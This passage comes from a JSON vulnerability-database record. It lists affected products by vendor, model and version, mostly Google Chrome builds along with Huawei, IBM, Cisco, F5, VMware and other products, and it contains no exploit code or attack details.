"31.0.1650.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1009.0" }, { "model": "oceanstor css v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.223.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.326" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1062.1" }, { "model": "hyperdp oceanstor n8500 v200r001c09", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.203" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.881.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.800.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.680.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.659.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.37599" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.330.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.84" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.2" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.93" }, { "model": "power hmc r7.6.0", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "rack server rh1288 v100r002c0", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1001" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.18" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "11000" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.70" }, { "model": "tam data manager", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1056" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.33" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.96" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.768.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.871.0" }, { "model": "gaia embedded r76", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "9710-e01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "qradar security information and event manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1010.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.35" }, { "model": "oceanstor hvs85t v100r001c99", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1304.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.61" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.1" }, { "model": "ipso r75.46", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "flex system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.670.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.378.0" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.27" }, { "model": "qlogic gb intelligent pass-thru module for ibm bladecenter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "87.10.1.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.551.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1281.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1037" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.466.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.611.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1060" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.126" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.547.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.300.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.509.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.387.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.382.3" }, { "model": "vcenter site recovery manager", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.290.0" }, { "model": "oceanstor s5500t v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7970" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.50" }, { "model": "gaia os r75.0", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "nsx for multi-hypervisor", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "4.1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.386.0" }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.15" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1056.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1670.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.839.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1281.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1277.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.764.0" }, { "model": "smartcloud provisioning fixpack for sv", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.67" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.97" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.616.0" }, { "model": "identity services engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.66" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.90" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.105" }, { "model": "nexus intercloud for vmware", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000v0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.4.154.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.45" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.777.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.71" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.564.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1046" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1081.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.868.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.220" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.2" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.42" }, { "model": "network security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "8.1.72" }, { "model": "oceanstor s6800t v100r005c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "colorqube", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "9302" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.397.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.70" }, { "model": "secureplatform r70.30", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.99" }, { "model": "oceanstor n8000 oceanstor s2300", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v100" }, { "model": "prime collaboration provisioning", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.85" }, { "model": "security access manager for enterprise single sign-on", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.7" }, { "model": "move antivirus multi-platform", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "2.0" }, { "model": "ib6131 40gb infiniband switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.491.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.74" }, { "model": "exadata storage server software", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "nsm3000 appliances", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1054.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1017.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.535.1" }, { "model": "espace u2990 v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1289.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.58" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.825.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.814.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.600.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.566.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.132" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.137" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.877.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.860.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.475.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1070.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.102" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura conferencing standard edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.2" }, { "model": "local collector appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.8" }, { "model": "vfabric postgres", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "9.2.4" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.958.1" }, { "model": "gaia r77.20", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.94" }, { "model": "server automation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.16" }, { "model": "vcloud networking and security", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5.3" }, { "model": "vcenter server appliance update", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.11" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.31" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.4" }, { "model": "oceanstor s8100 v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.415.1" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "gaia embedded r70.50", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.108" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.32" }, { "model": "vcenter application discovery manager", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1020.0" }, { "model": "enterprise linux els", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.614.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.57" }, { "model": "gaia embedded r70.20", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.344.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.9" }, { "model": "move antivirus multi-platform", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "3.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.235" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.156.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.111" }, { "model": "flashsystem", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8400" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.18" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.715.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.5" }, { "model": "workcentre spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7535061.121.225.06100" }, { "model": "service control engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "80000" }, { "model": "secureplatform r75.40vs", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "t620 flexible dual core thin client", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "oceanstor s6800t v100r005c50", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.17" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.505.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1063.0" }, { "model": "aura system manager sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.286.0" }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.0" }, { "model": "gaia embedded r71.40", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "oceanstor vis6600t v200r003c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.15" }, { "model": "vcloud automation center application services", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.723.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.105" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.134" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.725.0" }, { "model": "oceanstor 9000e v100r002c19", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storefabric h-series switches", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "telepresence conductor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.224" }, { "model": "ipso r70.30", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "email gateway patch", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.8" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.52" }, { "model": "flex system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.672.0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.358.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.151" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.2" }, { "model": "vcenter infrastructure navigator", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.223.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.107" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.754.0" }, { "model": "ipso r75", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.58" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.73" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1007" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1659.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.783.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.19" }, { "model": "ios-xr", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": 